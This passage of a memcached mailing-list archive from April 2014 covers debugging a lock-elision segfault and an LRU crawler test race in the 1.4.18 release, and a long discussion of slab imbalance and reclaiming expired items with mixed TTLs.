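        pthread_mutex_unlock(&lock);
        pthread_join(tid, NULL);
        return 0;
    }

On non-TSX hardware the same mistake often appears to work, which is consistent with the crash only showing up on the Haswell-class machine here.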
Re: 1.4.18
Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 0xf7dbfb40 (LWP 7)] 0xf7f7f988 in __lll_unlock_elision () from /usr/lib/libpthread.so.0 (gdb) bt #0 0xf7f7f988 in __lll_unlock_elision () from /usr/lib/libpthread.so.0 #1 0xf7f790e0 in __pthread_mutex_unlock_usercnt () from /usr/lib/libpthread.so.0 #2 0xf7f79bff in pthread_cond_wait@@GLIBC_2.3.2 () from /usr/lib/libpthread.so.0 #3 0x08061bfe in item_crawler_thread () #4 0xf7f75f20 in start_thread () from /usr/lib/libpthread.so.0 #5 0xf7ead94e in clone () from /usr/lib/libc.so.6 Holy crap lock elision. I have one machine with a haswell chip here, but I'll have to USB boot. Is getting an Arch liveimage especially time consuming? Not at all; if you download the latest install ISO (https://www.archlinux.org/download/) it is a live CD and you can boot straight into an Arch environment. You can do an install if you want, or just run live and install any necessary packages (`pacman -S base-devel gdb`) and go from there. Okay, seems like I'll have to give it a shot since this still isn't working well. https://github.com/dormando/memcached/tree/crawler_fix Can you try this? The lock elision might've made my undefined behavior mistake of not holding a lock before initially waiting on the condition fatal. A further fix might be required, as it's possible someone could kill the do_etc flag before the thread fully starts and it'd drop out with the lock held. That would be an incredible feat though. The good news here is now that we found our way to lock elision, both 64-bit and 32-bit builds (including one straight from git and outside the normal packaging build machinery) blow up in the same place. No segfault after applying this patch, so we've made progress. I love progress. Thanks! On the 64bit host, can you try increasing the sleep on t/lru-crawler.t:39 from 3 to 8 and try again? I was trying to be clever but that may not be working out. Didn't change anything, same two failures with the same output listed. I feel like something's a bit different between your two tests. In the first set, it's definitely not crashing for the 64bit test, but not working either. Is something weird going on with the second set of tests? You noted it seems to be running a 32bit binary still. I'm willing to ignore the 64-bit failures for now until we figure out the 32-bit ones. In any case, I wouldn't blame the cross-compile or toolchain, these have all been built in very clean, single architecture systemd-nspawn chroots. Thanks, I'm just trying to reason why it's failing in two different ways. The initial failure of finding 90 items when it expected 60 is a timing glitch, the other ones are this thread crashing the daemon. One machine was an i7 with TSX, thus the lock elision segfaults. The other is a much older Core2 machine. Enough differences there to cause problems, especially if we are dealing with threading-type things? Can you give me a summary of what the core2 machine gave you? I've built on a core2duo and nehalem i7 and they all work fine. I've also torture tested it on a brand new 16 core (2x8) xeon. On the i7 machine, I think we're still experiencing segfaults. Running just the LRU test; note the two undef values showing up again: $ prove t/lru-crawler.t t/lru-crawler.t .. 93/189 # Failed test 'slab1 now has 60 used chunks' # at t/lru-crawler.t line 57. # got: '90' # expected: '60' # Failed test 'slab1 has 30 reclaims' # at t/lru-crawler.t line 59. 
# got: '0' # expected: '30' # Failed test 'disabled lru crawler' # at t/lru-crawler.t line 69. # got: undef # expected: 'OK # ' # Failed test at t/lru-crawler.t line 72. # got: undef # expected: 'no' # Looks like you failed 4 tests of 189. t/lru-crawler.t .. Dubious, test returned 4 (wstat 1024, 0x400) Failed 4/189 subtests Changing the `sleep 3` to `sleep 8` gives non-deterministic results; two runs in a row were different. $ prove t/lru-crawler.t t/lru-crawler.t .. 93/189 # Failed test 'slab1 now has 60 used chunks' # at t/lru-crawler.t line 57. # got: '90' # expected: '60' # Failed test 'slab1 has 30 reclaims' # at t/lru-crawler.t line 59. # got: '0' # expected: '30' # Failed test 'ifoo29 == 'ok'' # at /home/dan/memcached/t/lib/MemcachedTest.pm line 59. # got: undef # expected: 'VALUE ifoo29 0 2 # ok # END # ' t/lru-crawler.t .. Failed 10/189 subtests Test Summary Report --- t/lru-crawler.t
Re: 1.4.18
On Sat, Apr 19, 2014 at 6:05 PM, dormando dorma...@rydia.net wrote: Once I wrapped my head around it, figured this one out. This cheap patch fixes the test, although I'm not sure it is the best actual solution. Because we don't set the lru_crawler_running flag on the main thread, but in the LRU thread itself, we have a race condition here. pthread_create() is by no means required to actually start the thread right away or schedule it, so the test itself asks too quickly if the LRU crawler is running, before the auxiliary thread has had the time to mark it as running. The sleep ensures we at least give that thread time to start. (Debugged by way of adding a print to STDERR statement in the while(1) loop. The only time I saw the test actually pass was when that loop caught and repeated itself for a while. It failed when it only ran once, which would make sense if the thread hadn't actually set the flag yet.) Ahh okay. Weird that you're able to see that, as the crawl command signals the thread. Hmm... no easy way to tell if it *had* fired or if it's not yet fired. The parts I thought really hard about seem to be doing okay, but the scaffolding I apparently goofed fairly bad, heh. I just pushed another commit to the crawler_fix tree, can you try it and see if it works with an unmodified test? We're good to go now, as far as I can tell. Ran the LRU test about 10 times on both machines I've been using today and it works every time now; no problems with the full test suite at this point either. Cool, thanks again. I just pushed these changes to master. I kinda want to find some other stuff to put in before shoveling out a .19 though. Are you a packager for Arch? Can you ship .18 with the patches?
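The race described here (pthread_create() returning before the new thread has set its own running flag) has a couple of standard remedies: set the flag from the creating thread while holding the lock, or have the creator wait for the new thread to announce itself. This is a generic sketch of the second option, a startup handshake; it is not necessarily what the crawler_fix branch ended up doing. (Build with -pthread.)

    #include <pthread.h>
    #include <stdbool.h>
    #include <stdio.h>

    static pthread_mutex_t lock         = PTHREAD_MUTEX_INITIALIZER;
    static pthread_cond_t  started_cond = PTHREAD_COND_INITIALIZER;
    static bool thread_started = false;

    static void *crawler(void *arg) {
        (void)arg;
        /* Announce startup before doing anything else, so a caller checking a
         * "running" flag right after spawning us never sees a stale value. */
        pthread_mutex_lock(&lock);
        thread_started = true;
        pthread_cond_signal(&started_cond);
        pthread_mutex_unlock(&lock);

        puts("crawler: running");
        return NULL;
    }

    /* Spawn the thread and block until it has marked itself started.  Without
     * this handshake there is no guarantee the new thread has even been
     * scheduled by the time pthread_create() returns, which is the window the
     * sleep in the test was papering over. */
    static int start_crawler(pthread_t *tid) {
        if (pthread_create(tid, NULL, crawler, NULL) != 0) return -1;
        pthread_mutex_lock(&lock);
        while (!thread_started)
            pthread_cond_wait(&started_cond, &lock);
        pthread_mutex_unlock(&lock);
        return 0;
    }

    int main(void) {
        pthread_t tid;
        if (start_crawler(&tid) == 0) {
            puts("main: crawler is confirmed running");
            pthread_join(tid, NULL);
        }
        return 0;
    }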
Re: Memcached somehow hangs or stops working
exhausted memory isn't going to cause it to pause... http://memcached.org/timeouts for the typical run-through of timeout problems. On Tue, 15 Apr 2014, Suraj Narkhede wrote: Or maybe it's that you have exhausted your memory. Can you please check in the stats if there is any eviction_count? This problem will also get solved once memcached is restarted. Suraj On Tue, Apr 15, 2014 at 1:14 PM, Jon Hauksson jon.hauks...@storytel.com wrote: Hi, thanks for the answers. We will try to upgrade. Yes, it does not work just to flush the memcached; we have to restart them, so maybe it's the persistent connections. On Monday, April 14, 2014 at 19:50:01 UTC+2, Jon Hauksson wrote: Hi, I work at a company where we use memcached and suddenly it stops working every three days or so. We did not really catch the problem at first, but now we have narrowed it down to memcached. Every time we restart our 2 memcached servers the system gets under control again. But when this happens we do not see any real problems in the logs etc... but it comes back after a restart of memcached. It does not work to just flush. If somebody has some information on what the problem could be it would be appreciated. We have 2 memcached servers on CentOS and the startup options are: memcached -d -m 4096 -c 4096 -t 25 Thanks, Jon
LRU Crawler + stuff for 1.4.18
Yo, A bunch of good fixes from Steven Grimm went into master a few months ago, but I was too busy to finish the release. I've thrown in a few more things and we'll call this 1.4.18 shortly, unless someone finds a major flaw: Steven fixed a bunch of potential reference leaks, and added a stats conns command: https://github.com/memcached/memcached/pull/60 I made the hash algo selectable (existing jenkins, murmurhash3 to start with): https://github.com/memcached/memcached/pull/66 and an LRU crawler: https://github.com/memcached/memcached/pull/64 Just want to do two more tiny commits on the crawler before merging and releasing the whole thing I think. Unless someone has major ideas/etc? I spent a little bit of time benchmarking it and it seems to be functioning fine, but I didn't go into a ton of depth in the torture. If the feature isn't enabled the code paths don't do anything at all, so if something is broken it won't harm people. have fun, -Dormando
1.4.18
http://code.google.com/p/memcached/wiki/ReleaseNotes1418
Re: Memcached somehow hangs or stops working
What version are you using? If less than 1.4.17, please upgrade to the latest version. Also, -t 25 is a huge waste. Use -t 4 unless you're doing more than several hundred thousand requests per second. On Mon, 14 Apr 2014, Jon Hauksson wrote: Hi, I work at a company where we use memcached and suddenly it stops working every three days or so. We did not really catch the problem at first, but now we have narrowed it down to memcached. Every time we restart our 2 memcached servers the system gets under control again. But when this happens we do not see any real problems in the logs etc... but it comes back after a restart of memcached. It does not work to just flush. If somebody has some information on what the problem could be it would be appreciated. We have 2 memcached servers on CentOS and the startup options are: memcached -d -m 4096 -c 4096 -t 25 Thanks, Jon
Re: Idea for reclamation algo
Yes :) If I recall how that works, it's mildly similar to a few other things I've seen. Not super trivial to implement in a short period of time though. On Sat, 12 Apr 2014, Ryan McElroy wrote: Facebook implemented a visitor plugin system that we use to kick out already-expired items in our memcached instances. It runs at low priority and doesn't cause much latency that we notice. I should really get our version back out there so that others can see how we did it and implement it in the legit memcached :-) ~Ryan On Fri, Apr 11, 2014 at 11:08 AM, dormando dorma...@rydia.net wrote: s/pagging/padding/. gah. On Fri, 11 Apr 2014, dormando wrote: On Fri, 11 Apr 2014, Slawomir Pryczek wrote: Hi Dormando, more about the behaviour... when we're using normal memcached 1.4.13 16GB of memory gets exhausted in ~1h, then we start to have almost instant evictions of needed items (again these items aren't really needed individually, just when many of them gets evicted it's unacceptable because of how badly it affects the system) Almost instant evictions; so an item is stored, into a 16GB instance, and 120 seconds later is bumped out of the LRU? You'll probably just ignore me again, but isn't this just slab imbalance? Once your instance fills up there're probably a few slab classes with way too little memory in them. 'stats slabs' shows you per-slab eviction rates, along with the last accessed time of an item when it was evicted. What does this look like on one of your full instances? The slab rebalance system lets you plug in your own algorithm by running the page reassignment commands manually. Then you can smooth out the pages to where you think they should be. You mention long and short TTL, but what are they exactly? 120s and an hour? A week? I understand your desire to hack up something to solve this, but as you've already seen scanning memory to remove expired items is problematic: you're either going to do long walks from the tail, use a background thread and walk a probe item through, or walk through random slab pages looking for expired memory. None of these are very efficient and tend to rely on luck. A better way to do this is to bucket the memory by TTL. You have lots of pretty decent options for this (and someone else already suggested one): - In your client, use different memcached pools for major TTL buckets (ie; one instance only gets long items, one only short). Make sure the slabs aren't imbalanced via the slab rebalancer. - Are the sizes of the items correlated with their TTL? Are 120s items always in a ~300 byte range and longer items tend to be in a different byte range? You could use length pagging to shunt them into specific slab classes, separating them internally at the cost of some ram efficiency. - A storage engine (god I wish we'd made 1.6 work...) which allows bucketing by TTL ranges. You'd want a smaller set of slab classes to not waste too much memory here, but the idea is the same as running multiple individual instances, except internally splitting the storage engine instead and storing everything in the same hash table. Those three options completely avoid latency problems, the first one requires no code modifications and will work very well. The third is the most work (and will be tricky due to things like slab rebalance, and none of the slab class identification code will work). I would avoid it unless I were really bored and wanted to maintain my own fork forever. 
~2 years ago i created another version based on that 1.4.13, than does garbage collection using custom stats handler. That version is able to be running on half of the memory for like 2 weeks, with 0 evictions. But we gave it full 16G and just restart it each week to be sure memory usage is kept in check, and we're not throwing away good data. Actually after changing -f1.25 to -f1.041 the slabs are filling with bad items much slower, because items are distributed better and this custom eviction function is able to catch more expired data. We have like 200GB of data evicted this way, daily. Because of volume (~40k req/s peak, much of it are writes) and differences in expire time LRU isn't able to reclaim items efficiently. Maybe people don't even realize the problem, but when we done some testing and turned off that custom eviction we had like 100% memory used
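Dormando's first option above (separate pools per TTL bucket) needs nothing more than a small routing function in the client. A hedged C sketch follows; the addresses and bucket boundaries are invented for illustration, and a real client would pass the chosen address to whatever memcached library it already uses.

    #include <stdio.h>

    /* Hypothetical pool list: one instance for short-lived items, one for
     * medium, one for long-lived.  Addresses are placeholders. */
    static const char *pools[] = {
        "10.0.0.1:11211",   /* TTL <= 5 minutes */
        "10.0.0.2:11211",   /* TTL <= 1 hour    */
        "10.0.0.3:11211",   /* everything else  */
    };

    /* Map a TTL (seconds) to a pool index.  Keeping wildly different TTLs in
     * separate instances keeps each instance's LRU homogeneous, so expired
     * short-TTL items are not stranded behind still-live long-TTL ones. */
    static int pool_for_ttl(unsigned ttl) {
        if (ttl <= 300)  return 0;
        if (ttl <= 3600) return 1;
        return 2;
    }

    int main(void) {
        unsigned ttls[] = {120, 500, 3600, 6 * 3600};
        for (unsigned i = 0; i < sizeof(ttls) / sizeof(ttls[0]); i++)
            printf("ttl=%-6u -> %s\n", ttls[i], pools[pool_for_ttl(ttls[i])]);
        return 0;
    }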
Re: Idea for reclamation algo
Hey Dormando... Some quick question first... i have checked some Intel papers on their memcached fork and for 1.6 it seems that there's some rather big lock contention... have you thought about just gluing individual items to a thread, using maybe item hash or some configurable method... this way 2 threads won't be able to access same item at one time. I'm wondering what whould be problems with such approach because it seems rational at first glance, instead of locking the whole cache... im just curious. Is there some release plan for 1.6... i think 2-3 years ago it was in developement... you're getting closer to releasing it? 1.4 tree has much less lock contention than 1.6. I made repeated calls for people to help pull bugs out of 1.6 and was ignored, so I ended up continuing development against 1.4... There's no whole-cache lock in 1.4, there's a whole-LRU lock but the operations are a lot shorter. It's much much faster than the older code. Im not ignoring your posts, actually i read them but didn't want that my posts were too large. Actually we tried using several other things beside memcached. After switching from mysql with some memory tables to memcached ~2 years ago measured throughput went from 40-50 req/s to about 4000 r/s. Back then it was fine, then when traffic went higher the cache was no longer able to evict items almost at all. Changing infrastructure in project that was in developement for over 2 years is not easy thing. We also tested some other things like mongodb, redis back then... and we just CAN'T have this data to be hitting disks. Maybe now there are more options, but we are already considering golang or C rewrite for this part... we don't want to switch to some other shared memory-ish system, just be able to access data directly between calls and do locking ourselves. So, again, as for current solution, decisions about what tools we use were made a very long time ago, and are not easy to change now. Almost instant evictions; so an item is stored, into a 16GB instance, and 120 seconds later is bumped out of the LRU? Yes, the items we insert for TTL=120 to 500s are not able to hold in cache even for 60s, when we start to read/aggregate them, and are thrown away instead of garbage. I understand why is that... S - short TTL L - long TTL SSSLSSS - when we insert L item, no S items before L will be able to get reclaimed, with current algo, ever. Because new L items, will appear later too... for LRU to work optimially under high loads, every item should have nearly the same TTL in given slab. You could try to reclaim from top and bottom but this way one hold forever item would break the whole thing as soon as it't get to top. I understand this part, I just find it suspicious. Longest items in pool are set for 5-6h. And unfortunately item size is no way correlated to TTL. We eg. store UA analyze and geo data for 5h. These items are very short, as short as eg. impression counters. Ok. Any idea what the ratio to long to short is? like 10% 120s, 90% 5h, or reverse or whatever? You'll probably just ignore me again, but isn't this just slab imbalance? No it isn't... how in hell can slab imbalance happen over just 1h, without code changes ;) I can make slab imbalance happen in under 10 seconds. Not really the point: Slab pages are pulled from the global pool as-needed as memory fills. If your traffic has ebbs and flows, or tends to set a lot more items in one class than others it will immediately fill and others will starve. 
A better way to do this is to bucket the memory by TTL. You have lots of pretty decent options for this (and someone else already suggested one) Sure, if we knew back then we'd just create 3-4 memcached instances, add some API and shard the items based on requested TTL. You can't do that now? That doesn't really seem that hard and doesn't change the fundamental infrastructure... It'd be a lot easier than maintaining your own fork of memcached forever, I'd think. The slab rebalance system lets you plug in your own algorithm by running the page reassignment commands manually. Then you can smooth out the pages to where you think they should be. Sure, but that's actually not my problem... the problem is that im having full of expired items, so this would require some hacking of that slab rebalance algo (am i right?)... and it seems a little complicated to me, to be done in 3-4 days time. Bleh. A better way to do this is to bucket the memory by TTL. You have lots of pretty decent options for this (and someone else already suggested one)Haha, sure it's better :) We'd obviously have done that if we knew 2 years ago what we know now :) I actually wrote a quick code to redirect about 20% of traffic we're sending/receiving to/from memcached to my hacked version... for all times on screens you neet to do minus 5 minutes (we run memcached, then enabled the code 5
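On the per-thread ownership question at the top of this post: the routing part is just a hash of the key modulo the thread count. The sketch below only shows that mapping; it is not how memcached 1.4 actually works (1.4 instead stripes item locks across hash buckets), and the hash here is FNV-1a purely to keep the example self-contained.

    #include <stdint.h>
    #include <stdio.h>

    #define NUM_THREADS 4

    /* FNV-1a, only so the sketch is deterministic and dependency-free;
     * memcached itself offers jenkins and murmur3. */
    static uint32_t fnv1a(const char *key) {
        uint32_t h = 2166136261u;
        for (; *key; key++) {
            h ^= (uint8_t)*key;
            h *= 16777619u;
        }
        return h;
    }

    /* Each key is owned by exactly one worker, so that worker can touch the
     * item without a global lock.  The trade-off is that every request must
     * be handed to the owning thread (a queue hop) instead of being served by
     * whichever thread accepted the connection. */
    static int owner_thread(const char *key) {
        return (int)(fnv1a(key) % NUM_THREADS);
    }

    int main(void) {
        const char *keys[] = {"user:1001", "session:abc", "counter:impressions"};
        for (unsigned i = 0; i < sizeof(keys) / sizeof(keys[0]); i++)
            printf("%-20s -> thread %d\n", keys[i], owner_thread(keys[i]));
        return 0;
    }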
Re: Idea for reclamation algo
On Sun, 13 Apr 2014, Slawomir Pryczek wrote: So high evictions when cleaning algo isn't enabled could be caused by slab imbalance due to high-memory slabs eating most of ram... and i just incorrectly assumed low TTL items are expired before high TTL items, because in such cases the cache didn't have enough memory to store all low TTL items, and both - low and high TTL's were evicted, interesting... yes. So you're saying if i set some item X, to evict it - i'd need to write AT LEAST as many new items as as X's slab contains, because item will be added on head, and you're removing from tail, right? yes. It's actually worse than that, since deleting items or fetching expired ones will make extra room, slowing it down. Actually, even worse than that still: During an allocation the *bottommost* item in the LRU is always checked for expiration before more memory is assigned. (this is the 'reclaimed' stat). So if you have a cache with only items of a TTL 60s, you will stop assigning memory if you set into the cache slower than they expire. Sending some slab stats, and TTL left for slab 1 where there are no evictions + slab 2 where there is plenty. Unfortunately i can't send dumps as these contain some sensitive data. http://img.liczniki.org/20140414/slabs_all_918-1397431358.png Can you *please* sent a text dump of stats items and stats slabs? Just grep out or censor what you don't want to share? Doing math against a picture is a huge annoyance. It's also missing important counters I'd like to look at. For ratio of long/short hard to tell... but most are definitely short. Slab class 3 has 1875968 total chunks in your example, which means in order to cause a 120s item to evict early you need to insert into *that slab class* at a rate of 15,000 items per second, unless it's a multi-hour item instead. In which case what you said is happening but reversed: lots of junk 120s items are causing 5hr items to evict, but after many minutes and definitely not mere seconds. Yes but as you can see this class only contains 15% of valid data and have plenty of evictions. The next class contains 7% valid data, but still have 4 evictions. Probably would be best just to keep TTLs same for all data... Your main complaint has been that 120s values don't persist for more than 60s, there's a 0% chance of any items in slab class 3 having a TTL of 120s. If you kept the TTL's all the same, what would they be? If they were all 120s and you rebalanced slabs, you'd probably never have a problem (but it seemed like you needed some data for longer). W dniu niedziela, 13 kwietnia 2014 21:12:43 UTC+2 użytkownik Dormando napisał: Hey Dormando... Some quick question first... i have checked some Intel papers on their memcached fork and for 1.6 it seems that there's some rather big lock contention... have you thought about just gluing individual items to a thread, using maybe item hash or some configurable method... this way 2 threads won't be able to access same item at one time. I'm wondering what whould be problems with such approach because it seems rational at first glance, instead of locking the whole cache... im just curious. Is there some release plan for 1.6... i think 2-3 years ago it was in developement... you're getting closer to releasing it? 1.4 tree has much less lock contention than 1.6. I made repeated calls for people to help pull bugs out of 1.6 and was ignored, so I ended up continuing development against 1.4... There's no whole-cache lock in 1.4, there's a whole-LRU lock but the operations are a lot shorter. 
It's much much faster than the older code. Im not ignoring your posts, actually i read them but didn't want that my posts were too large. Actually we tried using several other things beside memcached. After switching from mysql with some memory tables to memcached ~2 years ago measured throughput went from 40-50 req/s to about 4000 r/s. Back then it was fine, then when traffic went higher the cache was no longer able to evict items almost at all. Changing infrastructure in project that was in developement for over 2 years is not easy thing. We also tested some other things like mongodb, redis back then... and we just CAN'T have this data to be hitting disks. Maybe now there are more options, but we are already considering golang or C rewrite for this part... we don't want to switch to some other shared memory-ish system, just be able to access data directly between calls and do locking ourselves. So, again, as for current solution, decisions about what tools we use were made a very long time ago, and are not easy
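To make the 15,000-per-second figure earlier in this post explicit: in a full slab class an item can only be evicted once enough newer sets have pushed it from the head of the LRU to the tail, so the minimum sustained set rate needed to evict a 120 s item before it expires is roughly

    minimum set rate >= total chunks / TTL = 1875968 / 120 ≈ 15,633 sets per second into that one slab class

Anything slower and the item reaches the tail after its TTL has passed, at which point it is reclaimed as expired rather than evicted live.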
Re: Idea for reclamation algo
On Fri, 11 Apr 2014, Slawomir Pryczek wrote: Hi Dormando, more about the behaviour... when we're using normal memcached 1.4.13 16GB of memory gets exhausted in ~1h, then we start to have almost instant evictions of needed items (again these items aren't really needed individually, just when many of them gets evicted it's unacceptable because of how badly it affects the system) Almost instant evictions; so an item is stored, into a 16GB instance, and 120 seconds later is bumped out of the LRU? You'll probably just ignore me again, but isn't this just slab imbalance? Once your instance fills up there're probably a few slab classes with way too little memory in them. 'stats slabs' shows you per-slab eviction rates, along with the last accessed time of an item when it was evicted. What does this look like on one of your full instances? The slab rebalance system lets you plug in your own algorithm by running the page reassignment commands manually. Then you can smooth out the pages to where you think they should be. You mention long and short TTL, but what are they exactly? 120s and an hour? A week? I understand your desire to hack up something to solve this, but as you've already seen scanning memory to remove expired items is problematic: you're either going to do long walks from the tail, use a background thread and walk a probe item through, or walk through random slab pages looking for expired memory. None of these are very efficient and tend to rely on luck. A better way to do this is to bucket the memory by TTL. You have lots of pretty decent options for this (and someone else already suggested one): - In your client, use different memcached pools for major TTL buckets (ie; one instance only gets long items, one only short). Make sure the slabs aren't imbalanced via the slab rebalancer. - Are the sizes of the items correlated with their TTL? Are 120s items always in a ~300 byte range and longer items tend to be in a different byte range? You could use length pagging to shunt them into specific slab classes, separating them internally at the cost of some ram efficiency. - A storage engine (god I wish we'd made 1.6 work...) which allows bucketing by TTL ranges. You'd want a smaller set of slab classes to not waste too much memory here, but the idea is the same as running multiple individual instances, except internally splitting the storage engine instead and storing everything in the same hash table. Those three options completely avoid latency problems, the first one requires no code modifications and will work very well. The third is the most work (and will be tricky due to things like slab rebalance, and none of the slab class identification code will work). I would avoid it unless I were really bored and wanted to maintain my own fork forever. ~2 years ago i created another version based on that 1.4.13, than does garbage collection using custom stats handler. That version is able to be running on half of the memory for like 2 weeks, with 0 evictions. But we gave it full 16G and just restart it each week to be sure memory usage is kept in check, and we're not throwing away good data. Actually after changing -f1.25 to -f1.041 the slabs are filling with bad items much slower, because items are distributed better and this custom eviction function is able to catch more expired data. We have like 200GB of data evicted this way, daily. Because of volume (~40k req/s peak, much of it are writes) and differences in expire time LRU isn't able to reclaim items efficiently. 
Maybe people don't even realize the problem, but when we done some testing and turned off that custom eviction we had like 100% memory used with 10% of waste reported by memcached admin. But then we run that custom eviction algorithm it turned out that 90% of memory is occupied by garbage. Waste reported grew to 80% instantly after running unlimited reclaim expired on all items in the cache. So in standard client when people will be using different expire times for items (we have it like 1minute minimum, 6h max)... they even won't be able to see how much memory they're wasting in some specific cases, when they'll have many items that won't be hit after expiration, like we have. When using memcached as a buffer for mysql writes, we know exactly what to hit and when. Short TTL expired items, pile up near the head... long TTL live items pile up near the tail and it's creating a barrier that prevents the LRU algo to reclaim almost anything, if im getting how it currently works, correctly... You made it sound like you had some data which never expired? Is this true? Yes, i think because of how evictions are made (to be clear we're not setting non-expiring items). These short expiring items pile up in the front of linked list, something that is supposed to live for eg. 120 or 180 seconds is lingering in memory forever, untill we restart the cache... and new items are killed
Re: Idea for reclamation algo
s/pagging/padding/. gah. On Fri, 11 Apr 2014, dormando wrote: On Fri, 11 Apr 2014, Slawomir Pryczek wrote: Hi Dormando, more about the behaviour... when we're using normal memcached 1.4.13 16GB of memory gets exhausted in ~1h, then we start to have almost instant evictions of needed items (again these items aren't really needed individually, just when many of them gets evicted it's unacceptable because of how badly it affects the system) Almost instant evictions; so an item is stored, into a 16GB instance, and 120 seconds later is bumped out of the LRU? You'll probably just ignore me again, but isn't this just slab imbalance? Once your instance fills up there're probably a few slab classes with way too little memory in them. 'stats slabs' shows you per-slab eviction rates, along with the last accessed time of an item when it was evicted. What does this look like on one of your full instances? The slab rebalance system lets you plug in your own algorithm by running the page reassignment commands manually. Then you can smooth out the pages to where you think they should be. You mention long and short TTL, but what are they exactly? 120s and an hour? A week? I understand your desire to hack up something to solve this, but as you've already seen scanning memory to remove expired items is problematic: you're either going to do long walks from the tail, use a background thread and walk a probe item through, or walk through random slab pages looking for expired memory. None of these are very efficient and tend to rely on luck. A better way to do this is to bucket the memory by TTL. You have lots of pretty decent options for this (and someone else already suggested one): - In your client, use different memcached pools for major TTL buckets (ie; one instance only gets long items, one only short). Make sure the slabs aren't imbalanced via the slab rebalancer. - Are the sizes of the items correlated with their TTL? Are 120s items always in a ~300 byte range and longer items tend to be in a different byte range? You could use length pagging to shunt them into specific slab classes, separating them internally at the cost of some ram efficiency. - A storage engine (god I wish we'd made 1.6 work...) which allows bucketing by TTL ranges. You'd want a smaller set of slab classes to not waste too much memory here, but the idea is the same as running multiple individual instances, except internally splitting the storage engine instead and storing everything in the same hash table. Those three options completely avoid latency problems, the first one requires no code modifications and will work very well. The third is the most work (and will be tricky due to things like slab rebalance, and none of the slab class identification code will work). I would avoid it unless I were really bored and wanted to maintain my own fork forever. ~2 years ago i created another version based on that 1.4.13, than does garbage collection using custom stats handler. That version is able to be running on half of the memory for like 2 weeks, with 0 evictions. But we gave it full 16G and just restart it each week to be sure memory usage is kept in check, and we're not throwing away good data. Actually after changing -f1.25 to -f1.041 the slabs are filling with bad items much slower, because items are distributed better and this custom eviction function is able to catch more expired data. We have like 200GB of data evicted this way, daily. 
Because of volume (~40k req/s peak, much of it are writes) and differences in expire time LRU isn't able to reclaim items efficiently. Maybe people don't even realize the problem, but when we done some testing and turned off that custom eviction we had like 100% memory used with 10% of waste reported by memcached admin. But then we run that custom eviction algorithm it turned out that 90% of memory is occupied by garbage. Waste reported grew to 80% instantly after running unlimited reclaim expired on all items in the cache. So in standard client when people will be using different expire times for items (we have it like 1minute minimum, 6h max)... they even won't be able to see how much memory they're wasting in some specific cases, when they'll have many items that won't be hit after expiration, like we have. When using memcached as a buffer for mysql writes, we know exactly what to hit and when. Short TTL expired items, pile up near the head... long TTL live items pile up near the tail and it's creating a barrier that prevents the LRU algo to reclaim almost anything, if im getting how it currently works, correctly... You made it sound like you had some data which never expired? Is this true? Yes, i think because of how evictions are made (to be clear we're not setting non-expiring items). These short expiring items pile up in the front of linked list, something
Re: Idea for reclamation algo
Hey Dormando, thanks again for some comments... appreciate the help. Maybe i wasn't clear enough. I need only 1 minute persistence, and i can lose data sometimes, just i can't keep loosing data every minute due to constant evictions caused by LRU. Actually i have just wrote that in my previous post. We're loosing about 1 minute of non-meaningfull data every week because of restart that we do when memory starts to fill up (even with our patch reclaiming using linked list, we limit reclaiming to keep speed better)... so the memory fills up after a week, not 30 minutes... Can you explain what you're seeing in more detail? Your data only needs to persist for 1 minute, but it's being evicted before 1 minute is up? You made it sound like you had some data which never expired? Is this true? If your instance is 16GB, takes a week to fill up, but data only needs to persist for a minute but isn't, something else is very broken? Or am I still misunderstanding you? Now im creating better solution, to limit locking as linked list is getting bigger. I explained what was worst implications of unwanted evictions (or loosing all data in cache) in my use case: 1. loosing ~1 minute of non-significant data that's about to be stored in sql 2. flat distribution of load to workers (not taking response times into account because stats reset). 3. resorting to alternative targeting algorithm (with global, not local statistics). I never, ever said im going to write data that have to be persistent permanently. It's actually same idea as delayed write. If power fails you loose 5s of data, but you can do 100x more writes. So you need the data to be persistent in memory, between writes the data **can't be lost**. However you can lose it sometimes, that's the tradeoff that some people can make and some not. Obviously I can't keep loosing this data each minute, because if i loose much it'll become meaningfull. Maybe i wasn't clear in that matter. I can loose all data even 20 times a day. Sensitive data is stored using bulk update or transactions, bypassing that delayed write layer. 0 evictions, that's the kind of persistence im going for. So items are persistent for some very short periods of time (1-5 minutes) without being killed. It's just different use case. Running in production since 2 years, based on 1.4.13, tested for corectness, monitored so we have enough memory and 0 evictions (just reclaims) When i came here with same idea ~2 years ago you just said it's very stupid, now you even made me look like a moron :) And i can understand why you don't want features that are not ~O(1) perfectly, but please don't get so personal about different ideas to do things and use cases, just because these won't work for you. W dniu czwartek, 10 kwietnia 2014 20:53:12 UTC+2 użytkownik Dormando napisał: You really really really really really *must* not put data in memcached which you can't lose. Seriously, really don't do it. If you need persistence, try using a redis instance for the persistent stuff, and use memcached for your cache stuff. I don't see why you feel like you need to write your own thing, there're a lot of persistent key/value stores (kyotocabinet/etc?). They have a much lower request ceiling and don't handle the LRU/cache pattern as well, but that's why you can use both. Again, please please don't do it. You are damaging your company. You are a *danger* to your company. On Thu, 10 Apr 2014, Slawomir Pryczek wrote: Hi Dormando, thanks for suggestions, background thread would be nice... 
The idea is actually that with 2-3GB i get plenty of evictions of items that need to be fetched later. And with 16GB i still get evictions, actually probably i could throw more memory than 16G and it'd only result in more expired items sitting in the middle of slabs, forever... Now im going for persistence. Sounds probably crazy, but we're having some data that we can't loose: 1. statistics, we aggregate writes to DB using memcached (+list implementation). If these items get evicted we're loosing rows in db. Loosing data sometimes isn't a big problem. Eg. we restart memcached once a week so we're loosing 1 minute of data every week. But if we have evictions we're loosing data constantly (which we can't have) 2. we drive load balancer using data in memcached for statistics, again, not nice to loose data often because workers can get incorrect amount of traffic. 3. we're doing some adserving optimizations, eg. counting per-domain ad priority, for one domain it takes about 10 seconds to analyze all data and create list of ads, so can't be done online... we put result of this in memcached, if we loose too much of this the system will start
Re: Memcached version 1.4, 1.6
1.4 is the latest stable. 1.6 is a development branch. On Tue, 8 Apr 2014, Vakul Garg wrote: Hi Which is the latest memcached version (1.4 or 1.6)? I do not see engine-pu branch on memcached git. Is memcached version 1.6 deprecated? Regards Vakul
Re: Idea for reclamation algo
